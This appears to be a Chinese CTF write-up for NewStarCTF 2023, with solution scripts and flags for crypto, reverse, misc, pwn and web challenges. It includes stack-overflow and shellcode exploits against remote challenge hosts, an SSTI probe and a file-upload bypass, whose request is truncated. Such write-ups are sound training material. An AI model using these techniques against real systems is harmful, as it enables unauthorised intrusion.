Crypto
Caesar’s Secert
flag
flag{ca3s4r's_c1pher_i5_v4ry_3azy}
Fence
flag
flag{reordering_the_plaintext#686f8c03}
brainfuck
def shrinkBFCode(code):
    """Collapse runs of '+'/'-' in a Brainfuck program into single ops.

    Walks *code* once, tracking the data-pointer offset implied by '>'/'<'
    (so the emitted program contains no pointer moves) and folding each run
    of '+'/'-' into one '+' whose signed total is recorded separately.

    :param code: Brainfuck source string (a '%' op is passed through as well)
    :return: (nCode, cPos2Vars, cPos2Change) where nCode is the shrunk program
             (no '>'/'<', every +/- run replaced by a single '+'), cPos2Vars maps
             each index of nCode to the data cell it operates on, and
             cPos2Change maps the index of each folded '+' to its signed total.

    Limitation: a run of '+'/'-' at the very end of *code* is never flushed,
    because the flush only happens when a different character follows it.
    """
    cPos2Vars = {}
    cPos2Change = {}
    varPos = 0          # current data-pointer offset relative to the start
    nCode = []
    incVal = 0          # signed total of the +/- run currently being folded
    lc = None           # previous character
    dataChangeOp = set(['+', '-'])
    dataShiftOp = set(['>', '<'])   # NOTE: assigned but never used below
    for i in range(len(code)):
        c = code[i]
        # A +/- run just ended: emit one '+' carrying the signed total.
        if c not in dataChangeOp and lc in dataChangeOp:
            cPos2Change[len(nCode)] = incVal
            cPos2Vars[len(nCode)] = varPos
            nCode.append('+')
            incVal = 0
        if c == '>':
            varPos += 1
        elif c == '<':
            varPos -= 1
        else:
            if c in dataChangeOp:
                incVal += 1 if c == '+' else -1
            else:
                # Every other character is copied through, tagged with the
                # cell the pointer is on at that point.
                cPos2Vars[len(nCode)] = varPos
                nCode.append(c)
        lc = c
    return ''.join(nCode), cPos2Vars, cPos2Change


def generatePyCode(shellCode, pVars, pChange):
    """Translate a (shrunk) Brainfuck program into straight-line Python source.

    :param shellCode: output of shrinkBFCode (no '>'/'<'); raw Brainfuck also
                      works because '-' is handled and missing entries default
                      to a change of 1
    :param pVars: index -> data cell, from shrinkBFCode
    :param pChange: index -> signed increment of a folded '+', from shrinkBFCode
    :return: Python source as one string.  It reads and writes a list named
             ``data`` (and ``stdin`` for ',') that the caller has to provide.

    Two loop rewrites happen when a ']' is reached:
      * a loop with exactly one op inside (e.g. ``[-]``) becomes ``data[x] = 0``;
      * a longer loop whose body has no nested '[' and no '%' is replaced by
        ``data[v] (+|-)= k*data[x]`` for every other cell v changed inside it,
        followed by ``data[x] = 0`` — the loop is assumed to run
        data[x] / |net change of x| times.  ``k`` is computed with true
        division, so the emitted code carries floats such as ``2.0*data[0]``
        (visible in the output listing further down).  Any '.'/',' lines
        emitted inside such a loop are discarded by the rewrite, and a loop
        whose counter cell is never changed in its body raises KeyError.
    """
    pyCodes = []
    bStacks = []          # stack of ('[', index) for the currently open loops
    whileVarCache = {}    # '[' index -> {cell: net change recorded inside that loop}
    for i, c in enumerate(shellCode):
        d_pos = i if i not in pVars else pVars[i]           # cell this op targets
        d_change = 1 if i not in pChange else pChange[i]    # signed amount for a folded '+'
        indentLevel = len(bStacks)
        indentStr = ' '*(4*indentLevel)
        if c == '[':
            pyCodes.append('{}while data[{}] != 0:'.format(indentStr, d_pos))
            bStacks.append((c, i))
            whileVarCache[i] = {}
        elif c == ']':
            # Only '[' is ever pushed, so this check cannot fail in practice.
            if bStacks[-1][0] != '[':
                raise Exception('miss match of {}] found between {} and {}'.format(bStacks[-1][0], bStacks[-1][1], i))
            cNum = i-bStacks[-1][1]
            if cNum == 2:
                # Single-op loop body: drop the emitted body line and the
                # 'while' header, replace both with a clear of that cell.
                del pyCodes[-1]
                del pyCodes[-1]
                d_pos_l = i-1 if i-1 not in pVars else pVars[i-1]
                pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
            whileCode = shellCode[bStacks[-1][1]+1 : i]
            if cNum>2 and '[' not in whileCode and not '%' in whileCode:
                loopCondvar = bStacks[-1][1]
                d_pos_l = loopCondvar if loopCondvar not in pVars else pVars[loopCondvar]
                whileVars = whileVarCache[bStacks[-1][1]]
                cVarChange = whileVars[d_pos_l]      # net change of the loop counter per iteration
                # Pop every line emitted at exactly the body's indentation
                # (nested loops are excluded by the '[' check above), then the header.
                while len(pyCodes)>0 and pyCodes[-1].startswith(indentStr) and pyCodes[-1][len(indentStr)]!=' ':
                    pyCodes.pop()
                pyCodes.pop()
                for vPos, vChange in whileVars.items():
                    if vPos == d_pos_l:
                        continue
                    # True division: ctimes is a float (e.g. 2.0) in the emitted code.
                    ctimes = abs(vChange / cVarChange)
                    ctimesStr = '' if ctimes==1 else '{}*'.format(ctimes)
                    cSign = '+' if vChange > 0 else '-'
                    pyCodes.append('{}data[{}] {}= {}data[{}]'.format(' '*(4*(indentLevel-1)), vPos, cSign, ctimesStr, d_pos_l))
                pyCodes.append('{}data[{}] = 0'.format(' '*(4*(indentLevel-1)), d_pos_l))
            del whileVarCache[bStacks[-1][1]]
            bStacks.pop()
        elif c == '.':
            pyCodes.append('{}print(data[{}])'.format(indentStr, d_pos))
        elif c == ',':
            pyCodes.append('{}data[{}] = ord(stdin.read(1))'.format(indentStr, d_pos))
        elif c == '+':
            opSign = '-=' if d_change < 0 else '+='
            # A clear immediately followed by an increment of the same cell
            # folds into a plain assignment.
            if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, d_change)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            # Record the net change for the innermost open loop's rewrite.
            if bStacks:
                whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
                whileVarCache[bStacks[-1][1]][d_pos] += d_change
        elif c == '-':
            # Not reached for shrinkBFCode output (every run is emitted as '+');
            # kept so raw Brainfuck can be fed in directly.
            opSign = '+=' if d_change < 0 else '-='
            if pyCodes and pyCodes[-1] == '{}data[{}] = 0'.format(indentStr, d_pos):
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, -d_change)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            if bStacks:
                whileVarCache[bStacks[-1][1]].setdefault(d_pos, 0)
                whileVarCache[bStacks[-1][1]][d_pos] -= d_change
        elif c == '%':
            # Non-standard op used by this challenge: reduce a cell modulo its neighbour.
            pyCodes.append('{}data[{}] %= data[{}]'.format(indentStr, d_pos, d_pos+1))
    return '\n'.join(pyCodes)


# The Brainfuck program extracted from the challenge.
shellcode = "++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++."
shrinkCode, pVars, pChange = shrinkBFCode(shellcode)
print(generatePyCode(shrinkCode, pVars, pChange))
解密得到
# Output of generatePyCode for the shellcode above.  The float multipliers
# come from the transpiler's loop rewrite (true division).  `data` is not
# defined in this listing — presumably a zero-initialised list of ints, confirm
# before running.  Each print() emits a number; presumably these are the
# flag's character codes, which the write-up then converts.
data[0] += 8
data[2] += 2.0*data[0]
data[3] += 4.0*data[0]
data[4] += 6.0*data[0]
data[5] += 8.0*data[0]
data[6] += 10.0*data[0]
data[7] += 12.0*data[0]
data[8] += 14.0*data[0]
data[9] += 16.0*data[0]
data[10] += 18.0*data[0]
data[11] += 20.0*data[0]
data[12] += 22.0*data[0]
data[13] += 24.0*data[0]
data[14] += 26.0*data[0]
data[15] += 28.0*data[0]
data[16] += 30.0*data[0]
data[0] = 0
data[7] += 6
print(data[7])
data[8] -= 4
print(data[8])
data[7] -= 5
print(data[7])
data[8] -= 5
print(data[8])
data[9] -= 5
print(data[9])
data[6] -= 1
print(data[6])
data[8] += 2
print(data[8])
print(data[8])
print(data[7])
print(data[8])
data[8] += 6
print(data[8])
print(data[8])
print(data[8])
print(data[8])
print(data[8])
data[8] -= 6
print(data[8])
print(data[7])
print(data[8])
data[3] += 3
print(data[3])
data[7] += 1
print(data[7])
data[4] += 7
print(data[4])
data[7] += 1
print(data[7])
data[4] -= 7
print(data[4])
data[7] -= 1
print(data[7])
data[4] += 1
print(data[4])
data[4] += 7
print(data[4])
data[4] -= 2
print(data[4])
print(data[4])
data[8] -= 3
print(data[8])
data[8] -= 1
print(data[8])
data[4] -= 1
print(data[4])
data[4] += 3
print(data[4])
print(data[8])
data[4] -= 7
print(data[4])
data[4] += 1
print(data[4])
data[9] += 2
print(data[9])
简单修改一下输出得到
或者CTF在线工具
flag
flag{Oiiaioooooiai#b7c0b1866fe58e12}
Vigenère
Vigenere Solver
flag
flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}
babyrsa
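from Crypto.Util.number import *
import binascii
import gmpy2
import rsa
from factordb.factordb import FactorDB

# Challenge parameters as given.
n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537

# Look n up on FactorDB.  This is a remote lookup: n is sent over the
# network and becomes visible to that service.
a = FactorDB(n)
a.connect()
fac = a.get_factor_list()

# FactorDB may only know a partial factorisation.  phi(n) below is the
# product of (p - 1) over distinct primes, so both conditions are checked
# explicitly instead of silently producing a wrong d.
product = 1
for i in fac:
    product *= i
if product != n:
    raise ValueError("FactorDB did not return a complete factorisation of n")
if len(set(fac)) != len(fac):
    raise ValueError("repeated prime factor: phi(n) needs the multiplicity-aware formula")

phi_n = 1
for i in fac:
    phi_n *= (i - 1)

d = gmpy2.invert(e, phi_n)
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
m = gmpy2.powmod(c, d, n)
# long_to_bytes (already imported from Crypto.Util.number) is safe for any
# length; unhexlify(hex(m)[2:]) raises when the hex string has odd length.
print(long_to_bytes(int(m)))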
flag
flag{us4_s1ge_t0_cal_phI}
babyxor
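enc = 'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
# Hex string -> list of byte values.
cipher_hex = [int(enc[i:i+2], 16) for i in range(0, len(enc), 2)]


def find_single_byte_xor_key(cipher, marker='flag'):
    """Search all 256 single-byte XOR keys for one that reveals *marker*.

    :param cipher: iterable of byte values (0..255)
    :param marker: substring expected in the recovered text
    :return: (key, plaintext) for the first matching key, or None if no key
             in 0..255 produces *marker* (including for empty input)
    """
    # range(256), not range(255): a byte key runs 0..255 inclusive.
    for key in range(256):
        candidate = ''.join(chr(c ^ key) for c in cipher)
        if marker in candidate:
            return key, candidate
    return None


result = find_single_byte_xor_key(cipher_hex)
if result is not None:
    key, flag = result
    print(f'key={key}\n{flag}')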
flag
flag{x0r_15_symm3try_and_e4zy!!!!!!}
small d
n,e都很大,直接考虑维纳攻击
github上找个脚本
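import gmpy2
import libnum


def continuedFra(x, y):
    """Return the continued-fraction expansion of x/y as partial quotients.

    :param x: numerator
    :param y: denominator
    :return: list [a0, a1, ...] with x/y = a0 + 1/(a1 + 1/(...))
    """
    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf


def gradualFra(cf):
    """Return the last convergent of the continued fraction *cf*.

    Note the tuple order: despite the variable names, the function returns
    (denominator, numerator) of the convergent — for cf = [a0] it yields
    (1, a0).  wienerAttack relies on exactly this order (d is the
    denominator and k the numerator of k/d ~ e/n).

    :param cf: list of partial quotients
    :return: (denominator, numerator)
    """
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator


def solve_pq(a, b, c):
    """Return the two integer roots of a*x^2 + b*x + c = 0 (Vieta).

    Called as solve_pq(1, n - phi + 1, n) the coefficient b equals p + q, so
    the roots returned are -p and -q; their product is still p*q == n, which
    is the only property wienerAttack checks.

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term
    :return: (root1, root2); exact only when the discriminant is a perfect square
    """
    par = gmpy2.isqrt(b * b - 4 * a * c)
    return (-b + par) // (2 * a), (-b - par) // (2 * a)


def getGradualFra(cf):
    """Return every convergent of *cf*, one per prefix, in gradualFra's order.

    Uses the standard recurrence p_i = a_i*p_{i-1} + p_{i-2},
    q_i = a_i*q_{i-1} + q_{i-2}, which is linear in len(cf) instead of
    recomputing each prefix from scratch.

    :param cf: list of partial quotients
    :return: list of (denominator, numerator) tuples
    """
    gf = []
    p_prev, p = 0, 1      # p_{-2}, p_{-1}
    q_prev, q = 1, 0      # q_{-2}, q_{-1}
    for a in cf:
        p_prev, p = p, a * p + p_prev
        q_prev, q = q, a * q + q_prev
        gf.append((q, p))
    return gf


def wienerAttack(e, n):
    """Recover a small RSA private exponent d from (e, n) via Wiener's attack.

    Walks the convergents k/d of e/n (the attack works when d is small,
    roughly d < n^(1/4)/3); for each candidate derives phi and checks
    whether x^2 - (p+q)x + n splits into factors of n.

    :param e: public exponent
    :param n: modulus
    :return: private exponent d, or None when no convergent works
    """
    cf = continuedFra(e, n)
    gf = getGradualFra(cf)
    for d, k in gf:
        if k == 0:
            continue
        if (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        b = n - phi + 1            # == p + q for the right phi
        if b * b - 4 * n < 0:      # negative discriminant: wrong convergent, skip instead of crashing in isqrt
            continue
        p, q = solve_pq(1, b, n)
        if p * q == n:
            return d
    return None


n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
d = wienerAttack(e, n)
if d is None:
    # Fail loudly instead of letting pow() raise a TypeError on None.
    raise SystemExit("Wiener's attack failed: d is not small enough for this key")
m = pow(c, d, n)
print(libnum.n2s(m).decode())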
flag
flag{learn_some_continued_fraction_technique#dc16885c}
babyencoding
part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`
part 1 base64: flag{dazzling_encoding#4e0ad4
part 2 base32: f0ca08d1e1d0f10c0c7afe422fea7
part 3 uuencode: c55192c992036ef623372601ff3a}
flag
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}
Affine
仿射密码
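def egcd(a, b):
    """Extended Euclid: return (g, x, y) with g = gcd(a, b) and a*x + b*y = g."""
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)


def modinv(a, m):
    """Return the inverse of *a* modulo *m*.

    :raises ValueError: when gcd(a, m) != 1 (ValueError is a subclass of
        Exception, so callers that caught the old bare Exception still work)
    """
    g, x, _ = egcd(a, m)
    if g != 1:
        raise ValueError('modular inverse does not exist')
    return x % m


def affine_brute_force(enc, modulus=256, marker=b'flag{'):
    """Try every affine key (key_0, key_1) over Z_modulus against *enc*.

    Decryption is p = key_0^-1 * (c - key_1) mod modulus; key_0 values
    with no inverse are skipped.

    :param enc: ciphertext bytes
    :param modulus: alphabet size (256 for raw bytes)
    :param marker: byte string the plaintext must contain to count as a hit
    :return: list of ((key_0, key_1), decrypted) for every matching key;
             empty for empty input or when nothing matches
    """
    hits = []
    for key_0 in range(modulus):
        try:
            inv_key_0 = modinv(key_0, modulus)
        except ValueError:   # gcd(key_0, modulus) != 1: not a valid multiplier
            continue
        for key_1 in range(modulus):
            decrypted = bytes([(inv_key_0 * (c - key_1)) % modulus for c in enc])
            if marker in decrypted:
                hits.append(((key_0, key_1), decrypted))
    return hits


modulus = 256
enc = bytes.fromhex(
    'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064'
)
for (key_0, key_1), decrypted in affine_brute_force(enc, modulus):
    print("Key found:", key_0, key_1)
    print("Decrypted flag:", decrypted)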
flag
flag{4ff1ne_c1pher_i5_very_3azy}
babyaes
from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *


def pad(data):
    """Right-pad *data* with NUL bytes up to 16 bytes.

    Only data shorter than 16 bytes is padded: for len(data) >= 16 the
    range is empty and data is returned unchanged, so a longer input that
    is not a multiple of 16 would reach AES-CBC unpadded and be rejected
    by the cipher.
    """
    return data + b"".join([b'\x00' for _ in range(0, 16 - len(data))])


def main():
    flag_ = pad(flag)
    # A 32-byte key made of one 16-byte random block repeated: both halves
    # are identical, so it holds only 128 bits of entropy.
    key = os.urandom(16) * 2
    iv = os.urandom(16)
    # This print appears to be the intended weakness: iv is only 16 bytes,
    # so the XOR leaves the key's high half exposed, and the low half then
    # yields iv.
    print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
    aes = AES.new(key, AES.MODE_CBC, iv)
    enc_flag = aes.encrypt(flag_)
    print(enc_flag)


if __name__ == "__main__":
    main()
搓个脚本
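from Crypto.Cipher import AES
from Crypto.Util.number import *

# Value printed by the challenge: bytes_to_long(key) ^ bytes_to_long(iv) ^ 1,
# with key = os.urandom(16) * 2 (32 bytes, both halves equal) and a 16-byte iv.
a = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'

# Undo the ^ 1 and lay the value out as 32 bytes.  The 16-byte iv only
# reaches the low half, so the high 16 bytes are the key half untouched,
# and the low 16 bytes are that same key half XOR iv.
a = a ^ 1
leaked = long_to_bytes(a, 32)
half = leaked[:16]
iv = bytes(x ^ y for x, y in zip(leaked[16:], half))
key = half * 2
print(half)
print(iv)
# The original script pasted the printed values back in by hand
# (key half b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,' and
# iv b'\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'); the derivation
# above should reproduce them without the manual copy step.
aes = AES.new(key, AES.MODE_CBC, iv)
dec_flag = aes.decrypt(enc)
print(dec_flag)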
flag
flag{firsT_cry_Aes}
Misc
CyberChef’s Secret
flag
flag{Base_15_S0_Easy_^_^}
空白格
whitespace
flag
flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}
机密图片
扫码的结果不对,应该有隐写
运用工具StegSolver
flag
flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}
隐秘的眼睛
SilentEye 直接梭
flag
flag{R0ck1ng_y0u_63b0dc13a591}
流量!鲨鱼!
wireshark打开,大略看一下http,200 OK包很可疑
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
应该是base64,base64一次看到熟悉的Zmxh,就猜到要再base64一次
flag
flag{Wri35h4rk_1s_u53ful_b72a609537e6}
压缩包们
修复文件头,修复成功后后缀名改成.zip解压
flag.zip提示损坏
继续修复
或者你如果是高贵的bandizip pro用户
注意到flag.zip内有一段base64密文
解密出来是I like six-digit numbers because they are very concise and easy to remember.
应该是提示flag.zip的解压密码是六位数字,密码232311
flag
flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}
Reverse
easy_RE
flag
flag{welc0me_to_rev3rse!!}
Segments
shift+F7
手动过滤一下,修改格式得到flag
flag
flag{You_ar3_g0od_at_f1nding_ELF_segments_name}
咳
upx -d 脱壳
exp
enc = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
# Every character sits one code point above the flag character; shift each
# one back down.
flag = ''.join(chr(ord(ch) - 1) for ch in enc)
print(flag)
flag
flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}
ELF
encode加密完标准base64
先把密文base64解码成hex
exp
enc = [0x56, 0x5c, 0x51, 0x57, 0x6b, 0x74, 0x20, 0x8f, 0x24, 0x5f, 0x65, 0x8f, 0x27, 0x5e, 0x5f, 0x67, 0x8f, 0x67, 0x58, 0x51, 0x27, 0x8f, 0x75, 0x7c, 0x76, 0x8f, 0x21, 0x63, 0x2f, 0x6d]
# Decode step per byte: subtract 16, then XOR with 0x20.  The original
# expression `i - 16 ^ 0x20` already parses this way because `-` binds
# tighter than `^`; the parentheses just make it explicit.
flag = ''.join(chr((b - 16) ^ 0x20) for b in enc)
print(flag)
flag
flag{D0_4ou_7now_wha7_ELF_1s?}
AndroXor
jadx打开,循环异或
exp
enc = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
key = 'happyx3'
key_ascii = [ord(char) for char in key]

# The dumped array mixes raw ints with one-character strings; bring each
# entry to its byte value, then XOR it with the key byte at the same
# offset, the key repeating every len(key) positions.
key_len = len(key_ascii)
plain_bytes = (
    (value if isinstance(value, int) else ord(value)) ^ key_ascii[i % key_len]
    for i, value in enumerate(enc)
)
flag = "".join(chr(b) for b in plain_bytes)
print(flag)
flag
flag{3z_And0r1d_X0r_x1x1}
Endian
还是循环异或,因为小端序,所以异或因子是[0x78,0x56,0x34,0x12]
shift+E提取出array
exp
enc = [0x1E, 0x3A, 0x55, 0x75, 0x03, 0x3A, 0x58, 0x7B, 0x0C, 0x22, 0x58, 0x4D, 0x3D, 0x38, 0x50, 0x7B, 0x19, 0x38, 0x6B, 0x73, 0x05]
# 0x12345678 stored little-endian is the byte sequence 78 56 34 12 (see the
# note above); each ciphertext byte is XORed with the key byte at its
# offset mod 4.
key = [0x78, 0x56, 0x34, 0x12]
key_len = len(key)
flag = ''.join(chr(c ^ key[i % key_len]) for i, c in enumerate(enc))
print(flag)
flag
flag{llittl_Endian_a}
lazy_activity
非预期
正常解法
jadx打开有个flagactivity进程应该是点10000次出flag
打开模拟器app内提示’Where is my flag? Try to start another Activity.’
那就利用模拟器的adb工具
# Open a shell on the emulator, elevate (the emulator image has to be
# rooted for `su` to work), and start the activity directly by name.
adb shell
su
am start -n com.droidlearn.activity_travel/.FlagActivity
模拟器弹出这个界面
鼠标连点器或者写python脚本模拟点击就行
网上随便找的脚本
import pyautogui as pd
import time

# Keep pyautogui's fail-safe (mouse-to-corner abort) on: this is a runaway
# click loop and the fail-safe is the only way to stop it short of killing
# the process.
pd.FAILSAFE = True
# Time to bring the emulator window to the front and position the pointer.
time.sleep(3)
# 100000 clicks at the current pointer position, 0.1 ms apart.
pd.click(clicks=100000, interval=0.0001)
flag
flag{Act1v1ty_!s_so00oo0o_Impor#an#}
EzPE
打不开,头文件被修改了
随便找个exe文件复制过来fix一下
简单的异或
exp
enc = [0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C, 0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51, 0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04, 0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]
# The decode inverts enc[i] = plain[i] ^ i ^ enc[i+1]: the last byte is
# stored as-is, so walking backwards from it every enc[i+1] is already the
# value the step needs.  `enc` is decoded in place, as before.
l = len(enc) - 2
for i in reversed(range(l + 1)):
    enc[i] ^= i ^ enc[i + 1]
flag = ''.join(map(chr, enc))
print(flag)
flag
flag{Y0u_kn0w_what_1s_PE_File_F0rmat}
PWN
ret2text
栈溢出
exp
from pwn import *

# Remote instance used in the write-up.
p = remote("node4.buuoj.cn", 25617)
elf = ELF('./ret2text')
# Address of the `backdoor` function, read from the binary's symbol table.
backdoor = elf.symbols['backdoor']
# 40 bytes of filler followed by backdoor's address — presumably the
# distance to the saved return address for this binary (the note above only
# says it is a stack overflow); the constant is specific to this layout.
payload = b'a' * 40 + p64(backdoor)
p.sendline(payload)
p.interactive()
newstar_shop
看附件知道是个整型溢出
shop里面的money是unsigned int,无符号整数,但是don’t choose里面的money是int,有符号整数因此可以整数溢出,让他成为负数再返回购买。
依次输入1212313
ezshellcode
有个read
看看buf
直接传’\x90’ 全nop
from pwn import *

banary = "./ezshellcode"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 25641
local = 0  # 1: run the binary locally, 0: connect to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)
# arch must be set before shellcraft/asm so they target amd64.
context(log_level='debug', os='linux', arch='amd64')
sh = shellcraft.sh()
# 16 NOP bytes (0x8 + 8) ahead of the assembled shellcode; the note above
# says the buffer is filled with NOPs, the exact count is this binary's.
payload = b'\x90' * (0x8 + 8) + asm(sh)
io.send(payload)
io.interactive()
random
有个随机数,直接调用
from pwn import *

banary = "./pwn"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26831
local = 0  # 1: run the binary locally, 0: connect to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)
context(log_level='debug', os='linux', arch='amd64')
# Load the system libc through ctypes (cdll comes from pwn's star import)
# and seed its PRNG with the current time — presumably what the target does,
# so rand() here yields the same number the program expects.
clibc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
clibc.srand(clibc.time(0))
io.sendlineafter("number?\n", str(clibc.rand()))
io.interactive()
pieee
PIE保护
看看buf在栈中位置
传完buf 0x28个后直接跳到0x6c
from pwn import *

banary = "./pie"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26955
local = 0  # 1: run the binary locally, 0: connect to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)
context(log_level='debug', os='linux', arch='amd64')
# 0x28 bytes of filler, then a single byte 0x6c: per the note above only the
# low byte of the saved return address is replaced, which is why no PIE base
# address is needed here.
payload = b'a' * (0x28) + b'\x6c'
io.send(payload)
io.interactive()
web
ErrorFlask
随便传两个参数
http://236f6195-02b3-4823-a05d-a72a6fb2080a.node4.buuoj.cn:81/?number1={{%201+1%20}}&number2=1
flag
flag{Y0u_@re_3enset1ve_4bout_deb8g}
Begin of HTTP
提示用get方式传参,那就http://node4.buuoj.cn:28821/?ctf=1
提示用post 传 secret
F12看一下源码,找一下 secret
得到 secret=n3wst4rCTF2023g00000d
post 传一下
改一下cookie,改成ctfer
改 User-Agent 为 NewStarCTF2023
改Referer为 newstarctf.com
最后改一下请求头
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28821
Content-Length: 28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:28821
Content-Type: application/x-www-form-urlencoded
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: newstarctf.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Connection: close
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-I	P: 127.0.0.1

secret=n3wst4rCTF2023g00000d
泄露的秘密
找出泄露的敏感信息
访问 http://7dda953a-14dd-4219-bc4b-aee8b2ba0419.node4.buuoj.cn:81/www.zip
得到两个文件
robots.txt
和index.php
PART ONE: flag{r0bots_1s_s0_us3ful
<?php
// index.php recovered from www.zip: the second half of the flag is a
// string literal in the source, so anyone who can download the archive
// reads it — the "sensitive information" the challenge refers to.
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>";
flag
flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}
Begin of Upload
前端有文件后缀名检测
直接在包中修改后缀名
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 POST / HTTP/1.1 Host: 56547911 -1 b50-4 aed-a479-45190 dd2be26.node4.buuoj.cn:81 Content-Length: 308 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJDwfZKOoSI69Xzwk User-Agent: Mozilla/5.0 (Windows NT 10.0 ; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0 .0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9 ,image/avif,image/webp,image/apng,*
传完之后访问
